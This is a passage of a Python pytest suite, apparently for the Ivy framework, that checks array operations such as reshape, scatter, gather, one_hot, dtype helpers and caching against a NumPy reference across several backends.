# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# squeeze
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.squeeze(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if axis is None:
# expected_shape = [item for item in x.shape if item != 1]
# elif x.shape == ():
# expected_shape = []
# else:
# expected_shape = list(x.shape)
# expected_shape.pop(axis)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# ones
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.ones(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# full
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "fill_val", [2., -7.])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.full(shape, fill_val, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype(x, dtype, tensor_fn, dev, call):
# smoke test
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype(x)
# type test
assert isinstance(ret, ivy.Dtype)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
